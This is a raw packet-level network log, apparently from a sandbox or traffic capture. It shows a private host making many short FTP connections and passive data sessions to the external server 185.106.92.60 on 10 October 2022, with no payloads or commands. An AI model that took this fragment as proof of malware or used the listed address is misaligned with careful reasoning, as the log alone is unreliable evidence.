                                                                                                                                    Oct 10, 2022 06:03:28.762967110 CEST4998521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:28.786365986 CEST2149985185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:28.786576986 CEST4998521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:28.812556982 CEST2149985185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:28.812602997 CEST2149985185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:28.812706947 CEST4998521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:28.812741995 CEST2149985185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:28.812834024 CEST4998521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:28.812834024 CEST4998521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:28.812947989 CEST4998521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:28.835983992 CEST2149985185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:28.836106062 CEST4998521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:28.836281061 CEST4998521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:28.859397888 CEST2149985185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:28.859530926 CEST4998521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:28.859927893 CEST4998521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:28.883194923 CEST2149985185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:28.883383989 CEST4998521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:28.884392023 CEST4998521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:28.907846928 CEST2149985185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:28.908006907 CEST4998521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:28.908351898 CEST4998521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:28.931488037 CEST2149985185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:28.931629896 CEST4998521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:28.932569981 CEST4998521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:28.956077099 CEST2149985185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:28.956208944 CEST4998521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:28.956538916 CEST4998664680192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:28.979296923 CEST6468049986185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:28.979430914 CEST4998664680192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:28.979728937 CEST4998521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:29.003494024 CEST2149985185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:29.003650904 CEST4998521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:29.011831045 CEST4998664680192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:29.034401894 CEST6468049986185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:29.034447908 CEST6468049986185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:29.034589052 CEST4998664680192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:29.035202026 CEST2149985185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:29.035358906 CEST4998521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:29.035423994 CEST4998521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:29.058119059 CEST2149985185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:29.058393955 CEST2149985185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:29.058515072 CEST4998521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:29.168514967 CEST4998721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:32.170706034 CEST4998721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:32.193850994 CEST2149987185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:32.193990946 CEST4998721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:32.220361948 CEST2149987185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:32.220407009 CEST2149987185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:32.220458984 CEST4998721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:32.220458984 CEST4998721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:32.220473051 CEST2149987185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:32.220508099 CEST4998721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:32.220689058 CEST4998721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:32.243594885 CEST2149987185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:32.243710041 CEST4998721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:32.243906975 CEST4998721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:32.266870975 CEST2149987185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:32.267077923 CEST4998721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:32.267235041 CEST4998721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:32.290837049 CEST2149987185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:32.290962934 CEST4998721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:32.294394970 CEST4998721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:32.317862034 CEST2149987185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:32.318000078 CEST4998721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:32.325963974 CEST4998721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:32.348856926 CEST2149987185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:32.348985910 CEST4998721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:32.349960089 CEST4998721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:32.373281002 CEST2149987185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:32.373385906 CEST4998721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:32.373625040 CEST4998864682192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:32.396414995 CEST6468249988185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:32.396564007 CEST4998864682192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:32.396872044 CEST4998721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:32.420360088 CEST2149987185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:32.420469046 CEST4998721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:32.421051025 CEST4998864682192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:32.444533110 CEST6468249988185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:32.444813013 CEST6468249988185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:32.444885969 CEST4998864682192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:32.445130110 CEST2149987185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:32.445211887 CEST4998721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:32.445413113 CEST4998721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:32.468714952 CEST2149987185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:32.468751907 CEST2149987185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:32.468969107 CEST4998721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:32.592453957 CEST4998921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:32.615545988 CEST2149989185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:32.615700006 CEST4998921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:32.641608000 CEST2149989185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:32.641633034 CEST2149989185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:32.641829967 CEST4998921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:32.641927004 CEST2149989185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:32.641978025 CEST4998921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:32.644483089 CEST4998921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:32.667464018 CEST2149989185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:32.667648077 CEST4998921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:32.667867899 CEST4998921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:32.690964937 CEST2149989185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:32.691828966 CEST4998921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:32.692058086 CEST4998921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:32.715017080 CEST2149989185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:32.717379093 CEST4998921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:32.717782021 CEST4998921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:32.741127968 CEST2149989185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:32.741404057 CEST4998921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:32.741941929 CEST4998921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:32.764710903 CEST2149989185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:32.764867067 CEST4998921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:32.765980959 CEST4998921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:32.789433002 CEST2149989185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:32.789838076 CEST4998921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:32.790147066 CEST4999064684192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:32.814965963 CEST6468449990185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:32.815206051 CEST4999064684192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:32.815824032 CEST4998921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:32.840042114 CEST2149989185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:32.841624975 CEST4998921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:32.842211008 CEST4999064684192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:32.865767002 CEST6468449990185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:32.865868092 CEST6468449990185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:32.866003036 CEST4999064684192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:32.866146088 CEST2149989185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:32.866226912 CEST4998921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:32.866375923 CEST4998921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:32.888907909 CEST2149989185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:32.888941050 CEST2149989185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:32.889317989 CEST4998921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:33.020350933 CEST4999121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:33.045804977 CEST2149991185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:33.048474073 CEST4999121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:33.078115940 CEST2149991185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:33.078155994 CEST2149991185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:33.078217030 CEST2149991185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:33.078345060 CEST4999121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:33.078385115 CEST4999121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:33.086847067 CEST4999121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:33.111102104 CEST2149991185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:33.111260891 CEST4999121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:33.111371040 CEST4999121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:33.135073900 CEST2149991185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:33.135178089 CEST4999121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:33.135355949 CEST4999121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:33.159833908 CEST2149991185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:33.165586948 CEST4999121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:33.165826082 CEST4999121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:33.190541029 CEST2149991185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:33.193460941 CEST4999121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:33.194217920 CEST4999121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:33.217727900 CEST2149991185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:33.218291998 CEST4999121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:33.219876051 CEST4999121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:33.246174097 CEST2149991185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:33.246473074 CEST4999121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:33.246984959 CEST4999264685192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:33.270186901 CEST6468549992185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:33.273560047 CEST4999264685192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:33.274210930 CEST4999121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:33.298706055 CEST2149991185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:33.298923969 CEST4999121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:33.299496889 CEST4999264685192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:33.323223114 CEST6468549992185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:33.323712111 CEST6468549992185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:33.324286938 CEST4999264685192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:33.325575113 CEST2149991185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:33.325803995 CEST4999121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:33.326102972 CEST4999121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:33.349733114 CEST2149991185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:33.349872112 CEST2149991185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:33.350038052 CEST4999121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:33.478688002 CEST4999321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:33.503020048 CEST2149993185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:33.505582094 CEST4999321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:33.531658888 CEST2149993185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:33.531697989 CEST2149993185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:33.531768084 CEST4999321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:33.531802893 CEST4999321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:33.532268047 CEST2149993185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:33.532329082 CEST4999321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:33.532424927 CEST4999321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:33.555953979 CEST2149993185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:33.556271076 CEST4999321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:33.556540966 CEST4999321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:33.580229998 CEST2149993185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:33.580388069 CEST4999321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:33.580754042 CEST4999321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:33.604301929 CEST2149993185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:33.604834080 CEST4999321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:33.604868889 CEST4999321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:33.629040003 CEST2149993185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:33.630112886 CEST4999321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:33.630465031 CEST4999321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:33.653836012 CEST2149993185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:33.654314995 CEST4999321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:33.655333996 CEST4999321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:33.679876089 CEST2149993185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:33.679977894 CEST4999321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:33.680422068 CEST4999464686192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:33.705137968 CEST6468649994185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:33.705493927 CEST4999464686192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:33.705694914 CEST4999321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:33.731203079 CEST2149993185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:33.731321096 CEST4999321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:33.731831074 CEST4999464686192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:33.755793095 CEST6468649994185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:33.755997896 CEST6468649994185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:33.756094933 CEST4999464686192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:33.756108999 CEST2149993185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:33.756182909 CEST4999321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:33.756364107 CEST4999321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:33.780811071 CEST2149993185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:33.780842066 CEST2149993185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:33.781033039 CEST4999321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:33.899959087 CEST4999521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:33.923067093 CEST2149995185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:33.923275948 CEST4999521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:33.950196028 CEST2149995185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:33.950221062 CEST2149995185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:33.950237036 CEST2149995185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:33.950280905 CEST4999521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:33.950313091 CEST4999521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:33.950651884 CEST4999521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:33.973601103 CEST2149995185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:33.973776102 CEST4999521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:33.973865986 CEST4999521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:33.997592926 CEST2149995185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:33.997859955 CEST4999521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:33.998230934 CEST4999521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:34.021225929 CEST2149995185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:34.021568060 CEST4999521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:34.021663904 CEST4999521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:34.045378923 CEST2149995185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:34.045609951 CEST4999521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:34.046174049 CEST4999521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:34.069209099 CEST2149995185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:34.069379091 CEST4999521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:34.070327997 CEST4999521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:34.093643904 CEST2149995185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:34.093964100 CEST4999521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:34.094187975 CEST4999664687192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:34.119425058 CEST6468749996185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:34.119651079 CEST4999664687192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:34.119827986 CEST4999521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:34.144422054 CEST2149995185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:34.144524097 CEST4999521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:34.145937920 CEST4999664687192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:34.170317888 CEST6468749996185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:34.170495987 CEST6468749996185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:34.170675993 CEST4999664687192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:34.171339035 CEST2149995185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:34.171503067 CEST4999521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:34.175148010 CEST4999521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:34.197896957 CEST2149995185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:34.197990894 CEST2149995185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:34.198069096 CEST4999521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:34.323492050 CEST4999721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:34.346061945 CEST2149997185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:34.346218109 CEST4999721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:34.372826099 CEST2149997185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:34.372867107 CEST2149997185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:34.372875929 CEST2149997185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:34.373205900 CEST4999721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:34.373610973 CEST4999721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:34.396203995 CEST2149997185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:34.396440983 CEST4999721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:34.396617889 CEST4999721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:34.419356108 CEST2149997185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:34.419483900 CEST4999721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:34.419732094 CEST4999721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:34.442609072 CEST2149997185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:34.442751884 CEST4999721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:34.443063021 CEST4999721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:34.466301918 CEST2149997185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:34.466449022 CEST4999721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:34.466993093 CEST4999721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:34.489581108 CEST2149997185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:34.489831924 CEST4999721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:34.490928888 CEST4999721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:34.513787985 CEST2149997185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:34.513879061 CEST4999721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:34.514134884 CEST4999864688192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:34.538119078 CEST6468849998185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:34.538474083 CEST4999864688192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:34.539164066 CEST4999721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:34.562210083 CEST2149997185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:34.562376976 CEST4999721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:34.563314915 CEST4999864688192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:34.586716890 CEST6468849998185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:34.587328911 CEST6468849998185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:34.587450981 CEST4999864688192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:34.588460922 CEST2149997185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:34.588573933 CEST4999721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:34.589076042 CEST4999721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:34.611346960 CEST2149997185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:34.611399889 CEST2149997185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:34.611546040 CEST4999721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:34.765477896 CEST4999921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:34.788069963 CEST2149999185.106.92.60192.168.2.3
